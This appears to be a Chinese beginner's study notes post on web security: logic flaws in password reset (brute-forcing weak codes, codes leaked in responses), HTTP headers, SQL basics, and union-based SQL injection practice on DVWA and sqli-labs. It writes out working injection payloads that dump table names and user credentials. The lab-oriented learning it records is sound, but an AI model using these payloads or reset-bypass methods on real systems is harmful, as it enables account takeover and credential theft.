web基础知识:https://www.bugbank.cn/q/article/5982c773eec8b124691a2b2c.html
两个逻辑漏洞:
逻辑漏洞——简单的任意账户密码重置
逻辑漏洞-1https://www.bugbank.cn/q/article/59857e58236eaa5a3a8d8400.html
浅谈APP漏洞挖掘之逻辑漏洞
APP漏洞挖掘中逻辑漏洞,包括任意用户密码重置,支付漏洞,任意用户未授权登录。
方法一:密码找回的凭证太弱,为4位或6位纯数字,并且时效过长,导致可爆破从而重置用户密码
方法2:验证码传输在数据包中。
这里共有两种可能,一种在返回包,一种在获取验证码的数据包中。我们来看两个实例。
逻辑漏洞-2:https://www.bugbank.cn/q/article/5985809e236eaa5a3a8d8429.html
请求包的理解
post:向服务器发送数据包
get:获取数据包
host:主机名
user-agent:给用户做代理
accept:接受所获取的数据
referer:引用来源
Accept-Encoding:浏览器发给服务器,表明浏览器所能支持的编码类型
Accept-Language:请求头允许客户端声明它可以理解的自然语言
Cookie:储存在用户本地终端上的数据
问题:
1:什么样的字段是爆破字段,爆破是起到什么样的作用
通过向路老师请教 了解到爆破其实就是去通过反复的试验密码,进行丢包。
爆破字段就是把要爆破的内容选上,通过软件从字典里面读取,然后再替换成读取的数据。
2.单引号让ID闭合
像语文里面的语法一样,一个引号是不能成立的
想要的效果是 select name,pass from test where id = '1' union select1,database()#
需要输入 1' union select1,database()#
结合起来就是select name,pass from test where id = '1' union select1,database()#'
最后的单引号因为注释而失去的作用
此处的单引号是为了与前面的单引号闭合,为了保证语法正确,才能运行
3.在url中的输入你的payload
eg:http://localhost/sqli-labs-master/Less-2/?id=1--
数据库基础
一个数据库里有很多表,每个表里有许多字段,每个字段有各自的内容。
数据库相当于学校名称(一中、二中、三中),表相当于班级(一班、二班、三班),
字段相当于学生的属性(名字、学号、性别、),
字段的内容就是前面学生属性的具体内容(名字是什么,学号是什么,性别是什么)。
select 字段
from 表名
Select 密码
from 班级
select 字段名 from 表名
where 条件。
Select 密码
from 班级 where 学生学号=1
Select pass from new limit 1,2 (因为是从0开始排序
所以学号为1的人排序是0,学号为2 的人排序是1)
Union 联合查询
联合查询的意思是,你刚刚已经进行过一次查询了,
现在你想在查另外一个,他会把你第二次查询的内容放在第一次查询结果的后面。
比如说你第一次查了一个学生的名字,你现在用联合查询又查了他的密码,
他会把你查到的密码放在你第一次查到的名字的下面。
数据表之间的关系
一对多/多对一
一对一
多对多
dvwa sql注入
dvwa sql注入
级别:Low
① 输入1 提交
④输入1 and 1=2提交
输入
1' union select 1,table_name from information_schema.tables where table_name='dvwa'#
输入1' union select 1,column_name from information_schema.columns where table_name='users'#
输入
1' union select 1,concat(user,password) from users#
级别 Medium
级别 High
步骤和级别一相识
sql-labs
放截图太乱了 这是学习sql-labs的网址
源码下载地址:https://github.com/Audi-1/sqli-labs
安装方法 :https://jingyan.baidu.com/article/67662997a0527d54d51b84df.html
使用方法:https://cloud.tencent.com/developer/news/217484
https://www.xuebuyuan.com/3258224.html
网友评论